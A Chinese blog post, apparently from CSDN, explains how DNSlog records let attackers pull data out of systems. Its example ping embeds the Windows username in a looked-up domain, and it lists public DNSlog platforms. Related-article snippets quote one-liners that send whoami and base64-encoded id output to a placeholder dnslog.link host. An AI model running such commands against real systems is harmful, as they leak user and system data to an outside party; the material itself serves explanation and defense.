dnslog是怎么被黑客利用的

已于 2022-09-13 09:44:38 修改
阅读量3.9k 收藏 3
点赞数 1
分类专栏: 安全 文章标签: 服务器 网络 linux
于 2022-09-09 14:35:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ningyanggege/article/details/126778297
版权

简单来说,就是我有个已注册的域名a.com,我在域名代理商那里将域名设置对应的ip 1.1.1.1 上,这样当我向dns服务器发起a.com的解析请求时,DNSlog中会记录下他给a.com解析,解析值为1.1.1.1,而我们这个解析的记录的值就是我们要利用的地方。

看个直观一点的例子来理解:
ping命令的时候会用到DNS解析所以我就用ping命令做个实验:
在这里插入图片描述
可以看到解析的日志会把%USERNAME%的值给带出来,因为系统在ping命令之前会将%USERNAME%的值解析出来,然后再和abc.com拼接起来,最后ping命令执行将SH.a.com一起发给DNS服务器请求解析域名对应的ip地址,这个过程被记录下来就是DNSlog,看到这里应该有点感觉了。原理上只要能进行DNS请求的函数都可能存在DNSlog注入。

在这里插入图片描述
在这里插入图片描述

推荐几个DNSlog利用的平台:
http://www.dnslog.cn
http://admin.dnslog.link
http://ceye.io

Takoony
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
tornado项目搭建_如何搭建黑客常用的工具dnslog???看完学会
weixin_39902598的博客
11-26 557
1 前言DNSLOG是一种回显机制,常用于在某些漏洞无法回显但可以发起DNS请求的情况下,利用此方式外带数据,以解决某些漏洞由于无回显而难以利用的问题。主要利用场景有SQL盲注、无回显的命令执行、无回显的SSRF。本文介绍一种搭建DNSLOG平台的方法,旨在为渗透测试提供一些帮助。2 前期准备一个域名,一台vps本文使用的是:阿里云购买的域名和云服务器ECS域名:example.icuvps ip...
智能电视是如何被黑客攻击
08-21
近日,有网友爆料奇葩技术宅为求爱,黑掉爱慕对象的电视,上演惊悚电视求爱画面。
常见的DNS安全攻击有哪些?(国科云)
weixin_53018687的博客
05-09 746
DNS缓存同样带来较大的安全风险,攻击者可以利用DNS缓存机制,通过错误的解析数据针对DNS缓存进行投毒,当客户主机发起访问时,递归服务器就会将错误的解析数据返回给客户,从而将客户引导至错误的站点。由于DNS的特殊地位和作用,目前针对DNS发动的攻击愈发频繁,对DNS的安全造成了严重威胁。域名劫持一般是通过控制域名的控制权限,直接修改域名解析记录,将域名指向错误的服务器IP地址,或者修改域名的ns记录,将域名解析委托给受攻击者控制的DNS服务器,进而对域名的解析记录进行篡改。DNS攻击的形式有哪些?
创新蓝队-针对DNSlog数据外带攻击的应急与预防
Liyu_6618的博客
02-01 2065
创新蓝队-针对DNSlog数据外带攻击的应急与预防
【安全工具】DNSlog工具原理搭建及使用(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Python_paipai的博客
06-28 2014
比如说,我注册了一个为luomiweixiong.com的域名,我将 它的a记录泛解析到139.x.x.x上,这样就实现了无论我记录值填什么他都有解析,并且都指向139.x.x.x,当我向dns服务器发起test.luomiweixiong.com的解析请求时,DNSlog中会记录下他给test.luomiweixiong.com解析,解析值为139.x.x.x.网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
linux dns 攻击,DNSlog攻击技巧 | CN-SEC 中文网
weixin_35895753的博客
05-13 571
摘要linux: curl http://xxx.dnslog.link/`whoami` ping -c 1 `whoami`.xxx.dnslog.link 如果碰到内容有空格(换行符等),就会截断,只输出前面的,这时候可以利用编码来输出,但有输出字符数最大限制; curl http://xxx.dnslog.link/$(id|base64) 碰到ls这类多个输出的命令,直接使用脚...
DNSLog漏洞
shirlly_的博客
04-17 634
DNS(Domain Name System)是一个用于将域名转换为与之对应的 IP 地址的分布式命名系统。DNS日志是记录特定设备或网络发出的所有DNS查询的记录。这些日志可用于排除DNS问题、监控网络活动和分析流量模式。DNS日志通常包括信息,如源IP地址、查询的域名、查询类型(如A记录、MX记录)以及从DNS服务器接收到的响应。没有回显的情况下怎么办?利用限制利用DNSLog服务中的漏洞进行数据窃取攻击攻击者可以通过在受害者系统上植入恶意代码,使其发送DNS请求到恶意控制的DNSLog服务器
DNSLog漏洞探测(一)之DNSLog介绍
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-08 5505
DNSLog是一种基于DNS协议的信息收集技术,它可以用于网络安全领域的渗透测试、漏洞挖掘等方面。DNSLog的原理是利用DNS协议的特性,将需要收集的信息编码成DNS查询请求,然后将请求发送到DNS服务器,最后通过DNS服务器的响应来获取信息。DNSLog的实现方式有很多种,其中最常见的是使用第三方DNS服务。DNSLog的优点是隐蔽性高,缺点是响应时间较慢和存在一定的误报率。
在IIS6中启用父路径,不被黑客利用
01-10
因为根目录下的父路径会被以为成虚拟路径“..”,而其他路径下则可以用父路径。 此方法在Windows Server 2003, Enterprise Edition, Service Pack 2的自带IIS中测试通过。 iis6中启动父路径的方法: 在网站部署环境...
黑客利用ChatGPT做什么
05-04
黑客利用ChatGPT做什么
dnslog:简约的 DNS 日志记录工具
05-31
dns日志 信息 简约的 DNS 日志记录工具。 捕获所有 DNS 流量并将其文本表示(以压缩形式)存储到/var/log/dnslog/<date>.log.gz 。 创建用于网络取证目的。 $ zcat /var/log/dnslog/2018-07-12.log.gz | head 00:00:00.001595 R A 192.168.107.168 192.168.110.233 ocsp.verisign.com 23.37.43.27 00:00:00.001949 Q PTR 192.168.107.146 199.253.182.182 2.6.e.f.a.b.e.f.f.f.6.5.0.5.2.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f.ip6.arpa ? 00:00:00.002314 R AAAA 37.48.122.173 194.5
黑客利用ChatGPT做什么.zip
05-30
本文件《黑客利用ChatGPT做什么.docx》可能会探讨黑客如何利用ChatGPT的特性来进行恶意活动。 首先,黑客可以利用ChatGPT生成逼真的社交工程攻击。通过与ChatGPT的交互,黑客可以定制化构建钓鱼邮件、欺诈信息或...
黑客利用漏洞编译的软件
03-08
【标题】:“黑客利用漏洞编译的软件” 在IT领域,黑客软件通常指的是那些由黑客编写,用于探测、利用系统漏洞或安全弱点的程序。这里的“黑客”一词,可以理解为技术熟练的计算机专家,他们可能出于各种目的,如...
DNSLOG相关知识
12306小哥
07-15 585
0x01 DNS知识 域名系统(Domain Name System),是互联网使用的命名系统,用来便于人们使用的机器名字转换为IP地址。 0x02 DNS解析 2.1 解析过程要点 当某一个应用进程需要把主机名解析为IP地址时,该应用进程就调用解析程序,并成为DNS的一个客户(DNS Client),把待解析的域名放在DNS请求报文中,以UDP用户数据报方式发给本地域名服务器(使用UDP是为了减少开销)。本地域名服务器在查找域名后,把对应的IP地址放在响应报文中返回。应用进程获得目的主机的IP地址后即可进
DNSlog漏洞探测
2301_80661529的博客
03-16 1885
DNSlog 是一种 DNS 隧道技术,用于数据泄露或命令和控制(C2)通信。它利用 DNS 协议的特性,将数据编码为 DNS 查询或响应,从而实现数据通信。DNSlog 可用于检测子域取代、未授权区域传输和其他 DNS 相关漏洞。攻击者:攻击者将数据编码为 DNS 查询或响应,然后将其发送到 DNS 服务器DNS 服务器DNS 服务器会解析查询,并将响应发送回攻击者。攻击者:攻击者可以从 DNS 响应中提取数据,从而实现数据泄露或 C2 通信。
使用DNSLog进行盲打
谢公子的博客
04-28 5936
在渗透测试中,SQL盲注、命令盲注等漏洞是较难利用的,由于无回显,这类漏洞即使存在也显得有些鸡肋。针对此类问题,我们可以使用DNSLOG来进行突破。DNSLOG是一种回显机制,使用者可以通过DNS解析日志来读取漏洞的回显。 参考文章:使用DNSLOG拯救你的盲打盲注 ...
dnslog在mysql在linux_DNSLog在MySQL注入中的实战
weixin_32540913的博客
03-03 253
关于DNSlog在Web攻击利用简单理解就是在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起DNS请求,这个时候可以通过DNSlog这种方式把想获得的数据外带出来。常用在哪些情况下SQL注入中的盲注无回显的命令执行无回显的SSRFDNSlog攻击的基本原理作为攻击者,提交注入语句,让数据库把需要查询的值和域名拼接起来,然后发生DNS查询,我们只要能获得DNS日志,就得到了想要的值。所以我...
SQL注入之DNSLog外带注入
dragon的博客
02-21 2755
什么是dnslog呢?DNS就是域名解析服务,把一个域名转换成对应的IP地址,转换完成之后,DNS服务器就会有一个日志记录本次转换的时间、域名、域名对应的ip、请求方的一些信息,这个日志就叫DNSLog。但是想要查看DNSLog信息的人,必须是拥有DNS服务器权限的人,这就使的我们要是用dnslog注入方法的话,就需要搭建自己的一个dns服务器,成本相对较高。所以在此就推荐两个平台,可以快速让我们使用dnslog外带注入也可以使用BurpSuite同样可以实现相应功能。
白帽子黑客是什么意思?
05-30
白帽子黑客是指一类通过自己的技术能力,发现计算机系统或网络中存在的安全漏洞和风险,并提供相关的解决方案和建议,以帮助保障网络安全的技术人员。他们是计算机安全领域中的“好人”,其行为和活动是合法的、有益的,并且为保护网络安全和维护社会稳定做出了贡献。 相对于白帽子黑客,黑帽子黑客则是指那些利用自己的技术破坏计算机系统或网络安全、窃取他人隐私或者进行网络攻击等违法犯罪行为的人。黑帽子黑客的行为是非法的、有害的,其目的是获取利益或者进行恶意攻击。 另外,还有一类灰帽子黑客,他们是指既不属于白帽子黑客,也不属于黑帽子黑客的人,他们可能会在不合法的情况下测试系统安全性或者进行漏洞挖掘,但不会进行恶意攻击或者窃取他人隐私等行为。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值